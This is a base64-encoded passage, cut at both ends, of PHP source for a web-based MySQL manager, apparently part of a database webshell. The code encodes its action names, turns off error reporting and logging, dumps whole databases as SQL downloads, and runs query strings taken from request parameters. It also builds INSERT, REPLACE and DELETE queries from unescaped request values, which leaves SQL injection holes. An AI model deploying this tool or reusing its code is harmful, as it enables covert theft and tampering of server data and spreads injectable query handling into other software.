SaGRHRT0mZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcGFnZT0iLigkcGFnZSsyKTsNCgkJZWxzZQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1xdWVyeSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSZxdWVyeVN0cj0kcXVlcnlTdHImcGFnZT0iLigkcGFnZSsyKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+TmV4dDwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIk5leHQiOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRyb3cgPiAkcm93cGVycGFnZSApIHsNCgkJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBzaXplPTQgbmFtZT1wYWdlPlxuIjsNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdHbyc+XG4iOw0KCX0NCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjwvZm9udD5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZURhdGEoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBEYXRhPC9oMT5cbiI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKSB7DQoJCWVjaG8gIjxoMT5FZGl0IERhdGE8L2gxPlxuIjsNCgkJJHBSZXN1bHQgPSBteXNxbF9saXN0X2ZpZWxkcyggJGRibmFtZSwgJHRhYmxlbmFtZSApOw0KCQkkbnVtID0gbXlzcWxfbnVtX2ZpZWxkcyggJHBSZXN1bHQgKTsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRpID0gMDsgJGkgPCAkbnVtOyAkaSsrICkgew0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkNCgkJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSIgLiAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIiBBTkQgIjsNCgkJCQllbHNlDQoJCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0nIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJyBBTkQgIjsNCgkJfQ0KCQkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCQlteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCQkkcFJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgPSAgIlNFTEVDVCAqIEZST00gJHRhYmxlbmFtZSBXSEVSRSAka2V5IiwgJG15c3FsSGFuZGxlICk7DQoJCSRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJfQ0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRicgbWV0aG9kPXBvc3Q+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWFkZERhdGFfc3VibWl0PlxuIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1lZGl0RGF0YV9zdWJtaXQ+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10YWJsZW5hbWUgdmFsdWU9JHRhYmxlbmFtZT5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9Mj5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+TmFtZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5UeXBlPC90aD5cbiI7DQoJZWNobyAiPHRoPkZ1bmN0aW9uPC90aD5cbiI7DQoJZWNobyAiPHRoPkRhdGE8L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCgkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBSZXN1bHQgKTsNCgkkcFJlc3VsdExlbiA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJCSRmaWVsZG5hbWUgPSAkZmllbGRbIkZpZWxkIl07DQoJCSRmaWVsZHR5cGUgPSAkZmllbGRbIlR5cGUiXTsNCgkJJGxlbiA9IG15c3FsX2ZpZWxkX2xlbiggJHBSZXN1bHRMZW4sICRpICk7DQoJCWVjaG8gIjx0cj4iOw0KCQllY2hvICI8dGQ+JGZpZWxkbmFtZTwvdGQ+IjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJUeXBlIl0uIjwvdGQ+IjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiPHNlbGVjdCBuYW1lPSR7ZmllbGRuYW1lfV9mdW5jdGlvbj5cbiI7DQoJCWVjaG8gIjxvcHRpb24+XG4iOw0KCQllY2hvICI8b3B0aW9uPkFTQ0lJXG4iOw0KCQllY2hvICI8b3B0aW9uPkNIQVJcbiI7DQoJCWVjaG8gIjxvcHRpb24+U09VTkRFWFxuIjsNCgkJZWNobyAiPG9wdGlvbj5DVVJEQVRFXG4iOw0KCQllY2hvICI8b3B0aW9uPkNVUlRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+RlJPTV9EQVlTXG4iOw0KCQllY2hvICI8b3B0aW9uPkZST01fVU5JWFRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+Tk9XXG4iOw0KCQllY2hvICI8b3B0aW9uPlBBU1NXT1JEXG4iOw0KCQllY2hvICI8b3B0aW9uPlBFUklPRF9BRERcbiI7DQoJCWVjaG8gIjxvcHRpb24+UEVSSU9EX0RJRkZcbiI7DQoJCWVjaG8gIjxvcHRpb24+VE9fREFZU1xuIjsNCgkJZWNobyAiPG9wdGlvbj5VU0VSXG4iOw0KCQllY2hvICI8b3B0aW9uPldFRUtEQVlcbiI7DQoJCWVjaG8gIjxvcHRpb24+UkFORFxuIjsNCgkJZWNobyAiPC9zZWxlY3Q+XG4iOw0KCQllY2hvICI8L3RkPlxuIjsNCgkJJHZhbHVlID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YVskaV0pOw0KCQlpZiggJGNtZCA9PSAiYWRkIiApIHsNCgkJCSR0eXBlID0gc3RydG9rKCAkZmllbGR0eXBlLCAiICgsKVxuIiApOw0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8fCAkdHlwZSA9PSAic2V0IiApIHsNCgkJCQllY2hvICI8dGQ+XG4iOw0KCQkJCWlmKCAkdHlwZSA9PSAiZW51bSIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZT5cbiI7DQoJCQkJZWxzZSBpZiggJHR5cGUgPT0gInNldCIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZSBzaXplPTQgbXVsdGlwbGU+XG4iOw0KCQkJCXdoaWxlKCAkc3RyID0gc3RydG9rKCAiJyIgKSApIHsNCgkJCQkJZWNobyAiPG9wdGlvbj4kc3RyXG4iOw0KCQkJCQlzdHJ0b2soICInIiApOw0KCQkJCX0NCgkJCQllY2hvICI8L3NlbGVjdD5cbiI7DQoJCQkJZWNobyAiPC90ZD5cbiI7DQoJCQl9IGVsc2Ugew0KCQkJCWlmKCAkbGVuIDwgNDAgKQ0KCQkJCQllY2hvICI8dGQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTQwIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT48L3RkPlxuIjsNCgkJCQllbHNlDQoJCQkJCWVjaG8gIjx0ZD48dGV4dGFyZWEgY29scz00MCByb3dzPTMgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lPjwvdGV4dGFyZWE+XG4iOw0KCQkJfQ0KCQl9IGVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCQlpZiggJHR5cGUgPT0gImVudW0iIHx8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCWVjaG8gIjx0ZD5cbiI7DQoJCQkJaWYoICR0eXBlID09ICJlbnVtIiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lPlxuIjsNCgkJCQllbHNlIGlmKCAkdHlwZSA9PSAic2V0IiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lIHNpemU9NCBtdWx0aXBsZT5cbiI7DQoJCQkJd2hpbGUoICRzdHIgPSBzdHJ0b2soICInIiApICkgew0KCQkJCQlpZiggJHZhbHVlID09ICRzdHIgKQ0KCQkJCQkJZWNobyAiPG9wdGlvbiBzZWxlY3RlZD4kc3RyXG4iOw0KCQkJCQllbHNlDQoJCQkJCQllY2hvICI8b3B0aW9uPiRzdHJcbiI7DQoJCQkJCXN0cnRvayggIiciICk7DQoJCQkJfQ0KCQkJCWVjaG8gIjwvc2VsZWN0PlxuIjsNCgkJCQllY2hvICI8L3RkPlxuIjsNCgkJCX0gZWxzZSB7DQoJCQkJaWYoICRsZW4gPCA0MCApDQoJCQkJCWVjaG8gIjx0ZD48aW5wdXQgdHlwZT10ZXh0IHNpemU9NDAgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lIHZhbHVlPVwiJHZhbHVlXCI+PC90ZD5cbiI7DQoJCQkJZWxzZQ0KCQkJCQllY2hvICI8dGQ+PHRleHRhcmVhIGNvbHM9NDAgcm93cz0zIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT4kdmFsdWU8L3RleHRhcmVhPlxuIjsNCgkJCX0NCgkJfQ0KCQllY2hvICI8L3RyPiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdBZGQgRGF0YSc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IERhdGEnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0NhbmNlbCcgb25DbGljaz0naGlzdG9yeS5iYWNrKCknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KfQ0KDQpmdW5jdGlvbiBtYW5hZ2VEYXRhX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCSRxdWVyeVN0ciA9ICJJTlNFUlQgSU5UTyAkdGFibGVuYW1lIFZBTFVFUyAoIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCSRxdWVyeVN0ciA9ICJSRVBMQUNFIElOVE8gJHRhYmxlbmFtZSBWQUxVRVMgKCI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bS0xOyAkaSsrICkgew0KCQkkZmllbGQgPSBteXNxbF9mZXRjaF9maWVsZCggJHBSZXN1bHQgKTsNCgkJJGZ1bmMgPSAkR0xPQkFMU1skZmllbGQtPm5hbWUuIl9mdW5jdGlvbiJdOw0KCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJJHF1ZXJ5U3RyIC49ICIgJGZ1bmMoIjsNCgkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkgew0KCQkJJHF1ZXJ5U3RyIC49ICRHTE9CQUxTWyRmaWVsZC0+bmFtZV07DQoJCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJCSRxdWVyeVN0ciAuPSAiKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiLCI7DQoJCX0gZWxzZSB7DQoJCQkkcXVlcnlTdHIgLj0gIiciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXTsNCgkJCWlmKCAkZnVuYyAhPSAiIiApDQoJCQkJJHF1ZXJ5U3RyIC49ICInKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiJywiOw0KCQl9DQoJfQ0KCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCApOw0KCWlmKCAkZmllbGQtPm51bWVyaWMgPT0gMSApDQoJCSRxdWVyeVN0ciAuPSAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIikiOw0KCWVsc2UNCgkJJHF1ZXJ5U3RyIC49ICInIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJykiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCgl2aWV3RGF0YSggIiIgKTsNCn0NCg0KZnVuY3Rpb24gZGVsZXRlRGF0YSgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJJGtleSA9ICIiOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQlpZiggJGZpZWxkLT5udW1lcmljID09IDEgKQ0KCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0iIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICIgQU5EICI7DQoJCQllbHNlDQoJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICInIEFORCAiOw0KCX0NCgkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5U3RyID0gICJERUxFVEUgRlJPTSAkdGFibGVuYW1lIFdIRVJFICRrZXkiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCXZpZXdEYXRhKCAiIiApOw0KfQ0KDQpmdW5jdGlvbiBmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGUpDQp7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwkZGJuYW1lOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5X2lkID0gbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFICR0YWJsZSIsJG15c3FsSGFuZGxlKTsNCgkkdGFibGVkdW1wID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5X2lkLCBNWVNRTF9BU1NPQyk7DQoJJHRhYmxlZHVtcCA9ICJEUk9QIFRBQkxFIElGIEVYSVNUUyAkdGFibGU7XG4iIC4gJHRhYmxlZHVtcFsnQ3JlYXRlIFRhYmxlJ10gLiAiO1xuXG4iOw0KCWVjaG8gJHRhYmxlZHVtcDsNCgkvLyBnZXQgZGF0YQ0KCSRyb3dzID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gJHRhYmxlIiwkbXlzcWxIYW5kbGUpOw0KCSRudW1maWVsZHM9bXlzcWxfbnVtX2ZpZWxkcygkcm93cyk7DQoJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcm93cywgTVlTUUxfTlVNKSkNCgl7DQoJCSR0YWJsZWR1bXAgPSAiSU5TRVJUIElOVE8gJHRhYmxlIFZBTFVFUygiOw0KCQkkZmllbGRjb3VudGVyID0gLTE7DQoJCSRmaXJzdGZpZWxkID0gMTsNCgkJLy8gZ2V0IGVhY2ggZmllbGQncyBkYXRhDQoJCXdoaWxlICgrKyRmaWVsZGNvdW50ZXIgPCAkbnVtZmllbGRzKQ0KCQl7DQoJCQlpZiAoISRmaXJzdGZpZWxkKQ0KCQkJew0KCQkJCSR0YWJsZWR1bXAgLj0gJywgJzsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkZmlyc3RmaWVsZCA9IDA7DQoJCQl9DQoJCQlpZiAoIWlzc2V0KCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkpDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAnTlVMTCc7DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAiJyIgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkgLiAiJyI7DQoJCQl9DQoJCX0NCgkJJHRhYmxlZHVtcCAuPSAiKTtcbiI7DQoJCWVjaG8gJHRhYmxlZHVtcDsNCgl9DQoJQG15c3FsX2ZyZWVfcmVzdWx0KCRyb3dzKTsNCn0NCg0KZnVuY3Rpb24gZHVtcCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkYWN0aW9uLCAkZGJuYW1lLCAkdGFibGVuYW1lOw0KCWlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiICl7DQoJCWhlYWRlcigiQ29udGVudC1kaXNwb3NpdGlvbjogZmlsZW5hbWU9JHRhYmxlbmFtZS5zcWwiKTsNCgkJaGVhZGVyKCdDb250ZW50LXR5cGU6IHVua25vd24vdW5rbm93bicpOw0KCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGVuYW1lKTsNCgkJZWNobyAiXG5cblxuIjsNCgkJZWNobyAiXHJcblxyXG5cclxuIyMjICR0YWJsZW5hbWUgVEFCTEUgRFVNUCBDT01QTEVURUQgIyMjIjsNCgkJZXhpdDsNCgl9ZWxzZXsNCgkJaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBmaWxlbmFtZT0kZGJuYW1lLnNxbCIpOw0KCQloZWFkZXIoJ0NvbnRlbnQtdHlwZTogdW5rbm93bi91bmtub3duJyk7DQoJCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJCSRxdWVyeV9pZCA9IG15c3FsX3F1ZXJ5KCJTSE9XIHRhYmxlcyIsJG15c3FsSGFuZGxlKTsNCgkJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnlfaWQsIE1ZU1FMX05VTSkpDQoJCXsNCgkJCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkcm93WzBdKTsNCgkJCQllY2hvICJcblxuXG4iOw0KCQkJCWVjaG8gIlxyXG5cclxuXHJcbiMjIyAkcm93WzBdIFRBQkxFIERVTVAgQ09NUExFVEVEICMjIyI7DQoJCQkJZWNobyAiXG5cblxuIjsNCgkJfQ0KCQllY2hvICJcclxuXHJcblxyXG4jIyMgJGRibmFtZSBEQVRBQkFTRSBEVU1QIENPTVBMRVRFRCAjIyMiOw0KCQlleGl0Ow0KCX0NCn0NCg0KZnVuY3Rpb24gdXRpbHMoKSB7DQoJZ2xvYmFsICRQSFBfU0VMRiwgJGNvbW1hbmQ7DQoJZWNobyAiPGgxPlV0aWxpdGllczwvaDE+XG4iOw0KCWlmKCAkY29tbWFuZCA9PSAiIiB8fCBzdWJzdHIoICRjb21tYW5kLCAwLCA1ICkgPT0gImZsdXNoIiApIHsNCgkJZWNobyAiPGhyPlxuIjsNCgkJZWNobyAiU2hvd1xuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3ZhcmlhYmxlcyc+VmFyaWFibGVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3Byb2Nlc3NsaXN0Jz5Qcm9jZXNzbGlzdDwvYT5cbiI7DQoJCWVjaG8gIjwvdWw+XG4iOw0KCQllY2hvICJGbHVzaFxuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9ob3N0cyc+SG9zdHM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX2hvc3RzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGhvc3RzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9sb2dzJz5Mb2dzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9sb2dzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGxvZ3MiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3ByaXZpbGVnZXMnPlByaXZpbGVnZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3ByaXZpbGVnZXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggcHJpdmlsZWdlcyIgKSAhPSBmYWxzZSApDQoJCQkJZWNobyAiLSBTdWNjZXNzIjsNCgkJCWVsc2UNCgkJCQllY2hvICItIEZhaWwiOw0KCQl9DQoJCWVjaG8gIjxsaT48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXV0aWxzJmNvbW1hbmQ9Zmx1c2hfdGFibGVzJz5UYWJsZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3RhYmxlcyIgKSB7DQoJCQlpZiggbXlzcWxfcXVlcnkoICJGbHVzaCB0YWJsZXMiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9zdGF0dXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggc3RhdHVzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPC91bD5cbiI7DQoJfSBlbHNlIHsNCgkJJHF1ZXJ5U3RyID0gZXJlZ19yZXBsYWNlKCAiXyIsICIgIiwgJGNvbW1hbmQgKTsNCgkJJHBSZXN1bHQgPSBteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICk7DQoJCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJCWVjaG8gIkZhaWwiOw0KCQkJcmV0dXJuOw0KCQl9DQoJCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCQllY2hvICI8cCBjbGFzcz1sb2NhdGlvbj4kcXVlcnlTdHI8L3A+XG4iOw0KCQllY2hvICI8aHI+XG4iOw0KCQllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGJvcmRlcj0wPlxuIjsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJCWVjaG8gIjx0aD4iLiRmaWVsZC0+bmFtZS4iPC90aD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJCXdoaWxlKCAxICkgew0KCQkJJHJvd0FycmF5ID0gbXlzcWxfZmV0Y2hfcm93KCAkcFJlc3VsdCApOw0KCQkJaWYoICRyb3dBcnJheSA9PSBmYWxzZSApIGJyZWFrOw0KCQkJZWNobyAiPHRyPlxuIjsNCgkJCWZvciggJGogPSAwOyAkaiA8ICRjb2w7ICRqKysgKQ0KCQkJCWVjaG8gIjx0ZD4iLmh0bWxzcGVjaWFsY2hhcnMoICRyb3dBcnJheVskal0gKS4iPC90ZD5cbiI7DQoJCQllY2hvICI8L3RyPlxuIjsNCgkJfQ0KCQllY2hvICI8L3RhYmxlPlxuIjsNCgl9DQp9DQpmdW5jdGlvbiBmb290ZXJfaHRtbCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkUEhQX1NFTEYsICRVU0VSTkFNRTsNCgllY2hvICI8aHI+XG4iOw0KCWVjaG8gIjxzcGFuIGNsYXNzPVwibmV3XCI+WyRVU0VSTkFNRV08L3NwYW4+IC0gXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249YkdsemRFUkNjdz09Jz5EYXRhYmFzZSBMaXN0PC9hPiB8IFxuIjsNCglpZiggJHRhYmxlbmFtZSAhPSAiIiApDQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bGlzdFRhYmxlcyZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+VGFibGUgTGlzdDwvYT4gfCAiOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMnPlV0aWxzPC9hPiB8XG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bG9nb3V0Jz5Mb2dvdXQ8L2E+XG4iOw0KfQ0KLy8tLS0tLS0tLS0tLS0tIE1BSU4gLS0tLS0tLS0tLS0tLSAvLw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaW5pX3NldCAoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0ICgnbG9nX2Vycm9ycycsIDApOw0KaWYoICRhY3Rpb24gPT0gImxvZ29uIiB8fCAkYWN0aW9uID09ICIiIHx8ICRhY3Rpb24gPT0gImxvZ291dCIgKQ0KCWxvZ29uKCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJiRzluYjI1ZmMzVmliV2wwIiApDQoJbG9nb25fc3VibWl0KCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiIHx8ICRhY